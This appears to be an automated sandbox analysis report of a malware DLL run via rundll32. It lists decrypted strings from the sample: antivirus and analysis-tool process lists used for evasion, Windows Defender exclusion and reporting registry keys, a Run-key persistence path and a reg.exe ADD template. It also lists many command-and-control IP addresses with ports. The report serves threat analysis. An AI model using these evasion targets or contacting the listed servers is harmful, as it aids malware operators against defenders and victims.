            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ByteFence.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: type=0x%04X
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: snxhk_border_mywnd
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ROOT\CIMV2
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: https
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: fshoster32.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: kernelbase.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: regsvr32.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %s\system32\
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_Process
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: rundll32.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: LOCALAPPDATA
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: cmd.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: APPDATA
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: select
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: mcshield.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: advapi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ws2_32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .cfg
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_Product
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: WQL
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wininet.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: LastBootUpTime
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: urlmon.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Create
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_PnPEntity
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Initializing database...
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: winsta0\default
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .dat
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: WBJ_IGNORE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: next
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wpcap.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: image/pjpeg
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: fmon.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: vbs
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aswhooka.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SysWOW64
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: mpr.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: image/gif
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: crypt32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ntdll.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: open
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SystemRoot
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: cscript.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: C:\INTERNAL\__empty
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_PhysicalMemory
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ALLUSERSPROFILE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: image/jpeg
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: LocalLow
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: displayName
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: shlwapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CommandLine
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: kernel32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SubmitSamplesConsent
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: 1234567890
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wbj.go
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_DiskDrive
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: System32
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Name
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: WRSA.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: c:\\
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SpyNetReporting
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: FALSE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aswhookx.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Packages
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: application/x-shockwave-flash
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: RepUx.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Winsta0
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: avp.exe;kavtray.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: root\SecurityCenter2
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: MsMpEng.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: userenv.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: csc_ui.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: \\.\pipe\
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: pstorec.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: NTUSER.DAT
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: from
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: netapi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: gdi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: setupapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: iphlpapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CrAmTray.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_ComputerSystem
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: user32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: \sf2.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: egui.exe;ekrn.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Software\Microsoft
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %S.%06d
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: bcrypt.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wtsapi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: shell32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: TRUE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_Bios
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: c:\hiberfil.sysss
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: */*
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ByteFence.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: type=0x%04X
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: snxhk_border_mywnd
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ROOT\CIMV2
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: https
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: fshoster32.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: kernelbase.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: regsvr32.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %s\system32\
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_Process
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: rundll32.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: LOCALAPPDATA
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: cmd.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: APPDATA
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: select
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: mcshield.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: advapi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ws2_32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .cfg
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_Product
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: WQL
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wininet.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: LastBootUpTime
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: urlmon.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Create
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_PnPEntity
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Initializing database...
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: winsta0\default
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .dat
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: WBJ_IGNORE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: next
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wpcap.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: image/pjpeg
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: fmon.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: vbs
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aswhooka.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SysWOW64
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: mpr.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: image/gif
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: crypt32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ntdll.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: open
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: distantly.dat.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
            Source: unknownHTTPS traffic detected: 74.6.143.25:443 -> 192.168.2.4:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.4:49714 version: TLS 1.2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10009E70 FindFirstFileW,FindNextFileW,16_2_10009E70

            Networking

            barindex
            Source: Malware configuration extractorIPs: 86.173.2.12:2222
            Source: Malware configuration extractorIPs: 92.9.45.20:2222
            Source: Malware configuration extractorIPs: 100.4.163.158:2222
            Source: Malware configuration extractorIPs: 213.64.33.92:2222
            Source: Malware configuration extractorIPs: 75.98.154.19:443
            Source: Malware configuration extractorIPs: 78.192.109.105:2222
            Source: Malware configuration extractorIPs: 88.126.94.4:50000
            Source: Malware configuration extractorIPs: 70.28.50.223:2083
            Source: Malware configuration extractorIPs: 92.154.17.149:2222
            Source: Malware configuration extractorIPs: 24.234.220.88:993
            Source: Malware configuration extractorIPs: 87.252.106.39:995
            Source: Malware configuration extractorIPs: 174.4.89.3:443
            Source: Malware configuration extractorIPs: 12.172.173.82:20
            Source: Malware configuration extractorIPs: 90.29.86.138:2222
            Source: Malware configuration extractorIPs: 70.160.67.203:443
            Source: Malware configuration extractorIPs: 223.166.13.95:995
            Source: Malware configuration extractorIPs: 184.181.75.148:443
            Source: Malware configuration extractorIPs: 95.45.50.93:2222
            Source: Malware configuration extractorIPs: 201.143.215.69:443
            Source: Malware configuration extractorIPs: 64.121.161.102:443
            Source: Malware configuration extractorIPs: 2.82.8.80:443
            Source: Malware configuration extractorIPs: 188.28.19.84:443
            Source: Malware configuration extractorIPs: 81.101.185.146:443
            Source: Malware configuration extractorIPs: 79.77.142.22:2222
            Source: Malware configuration extractorIPs: 84.215.202.8:443
            Source: Malware configuration extractorIPs: 183.87.163.165:443
            Source: Malware configuration extractorIPs: 74.12.147.139:2078
            Source: Malware configuration extractorIPs: 74.12.147.139:2222
            Source: Malware configuration extractorIPs: 74.12.147.139:2222
            Source: Malware configuration extractorIPs: 74.12.147.139:2083
            Source: Malware configuration extractorIPs: 70.28.50.223:2078
            Source: Malware configuration extractorIPs: 94.204.202.106:443
            Source: Malware configuration extractorIPs: 87.221.153.182:2222
            Source: Malware configuration extractorIPs: 70.28.50.223:2087
            Source: Malware configuration extractorIPs: 24.234.220.88:990
            Source: Malware configuration extractorIPs: 2.49.63.160:2222
            Source: Malware configuration extractorIPs: 72.205.104.134:443
            Source: Malware configuration extractorIPs: 199.27.66.213:443
            Source: Malware configuration extractorIPs: 83.249.198.100:2222
            Source: Malware configuration extractorIPs: 90.104.151.37:2222
            Source: Malware configuration extractorIPs: 116.75.63.183:443
            Source: Malware configuration extractorIPs: 70.28.50.223:2078
            Source: Malware configuration extractorIPs: 117.195.17.148:993
            Source: Malware configuration extractorIPs: 77.126.99.230:443
            Source: Malware configuration extractorIPs: 45.62.70.33:443
            Source: Malware configuration extractorIPs: 24.234.220.88:465
            Source: Malware configuration extractorIPs: 203.109.44.236:995
            Source: Malware configuration extractorIPs: 75.109.111.89:443
            Source: Malware configuration extractorIPs: 161.142.103.187:995
            Source: Malware configuration extractorIPs: 77.86.98.236:443
            Source: Malware configuration extractorIPs: 147.147.30.126:2222
            Source: Malware configuration extractorIPs: 124.246.122.199:2222
            Source: Malware configuration extractorIPs: 103.123.223.133:443
            Source: Malware configuration extractorIPs: 180.151.19.13:2078
            Source: Malware configuration extractorIPs: 176.142.207.63:443
            Source: Malware configuration extractorIPs: 12.172.173.82:32101
            Source: Malware configuration extractorIPs: 103.140.174.20:2222
            Source: Malware configuration extractorIPs: 70.50.83.216:2222
            Source: Malware configuration extractorIPs: 12.172.173.82:465
            Source: Malware configuration extractorIPs: 38.2.18.164:443
            Source: Malware configuration extractorIPs: 93.187.148.45:995
            Source: Malware configuration extractorIPs: 70.64.77.115:443
            Source: Malware configuration extractorIPs: 12.172.173.82:21
            Source: Malware configuration extractorIPs: 70.49.205.198:2222
            Source: Malware configuration extractorIPs: 27.0.48.233:443
            Source: Malware configuration extractorIPs: 12.172.173.82:50001
            Source: Malware configuration extractorIPs: 83.110.223.61:443
            Source: Malware configuration extractorIPs: 103.141.50.43:995
            Source: Malware configuration extractorIPs: 85.101.239.116:443
            Source: Malware configuration extractorIPs: 103.42.86.42:995
            Source: Malware configuration extractorIPs: 92.1.170.110:995
            Source: Malware configuration extractorIPs: 81.229.117.95:2222
            Source: Malware configuration extractorIPs: 124.122.47.148:443
            Source: Malware configuration extractorIPs: 103.212.19.254:995
            Source: Malware configuration extractorIPs: 103.139.242.6:443
            Source: Malware configuration extractorIPs: 125.99.76.102:443
            Source: Malware configuration extractorIPs: 50.68.186.195:443
            Source: Malware configuration extractorIPs: 47.205.25.170:443
            Source: Malware configuration extractorIPs: 12.172.173.82:993
            Source: Malware configuration extractorIPs: 12.172.173.82:22
            Source: Malware configuration extractorIPs: 70.28.50.223:32100
            Source: Malware configuration extractorIPs: 79.168.224.165:2222
            Source: Malware configuration extractorIPs: 121.121.108.120:995
            Source: Malware configuration extractorIPs: 69.160.121.6:61201
            Source: Malware configuration extractorIPs: 200.84.211.255:2222
            Source: Malware configuration extractorIPs: 201.244.108.183:995
            Source: Malware configuration extractorIPs: 93.187.148.45:443
            Source: Malware configuration extractorIPs: 85.61.165.153:2222
            Source: Malware configuration extractorIPs: 184.182.66.109:443
            Source: Malware configuration extractorIPs: 175.156.217.7:2222
            Source: Malware configuration extractorIPs: 70.28.50.223:3389
            Source: Malware configuration extractorIPs: 114.143.176.236:443
            Source: Malware configuration extractorIPs: 65.95.141.84:2222
            Source: Malware configuration extractorIPs: 80.6.50.34:443
            Source: Malware configuration extractorIPs: 12.172.173.82:2087
            Source: Malware configuration extractorIPs: 47.199.241.39:443
            Source: Malware configuration extractorIPs: 66.241.183.99:443
            Source: Malware configuration extractorIPs: 113.11.92.30:443
            Source: Malware configuration extractorIPs: 186.75.95.6:443
            Source: Malware configuration extractorIPs: 125.99.69.178:443
            Source: Malware configuration extractorIPs: 109.130.247.84:2222
            Source: Malware configuration extractorIPs: 96.56.197.26:2222
            Source: Malware configuration extractorIPs: 70.50.1.252:2222
            Source: Malware configuration extractorIPs: 91.160.70.68:32100
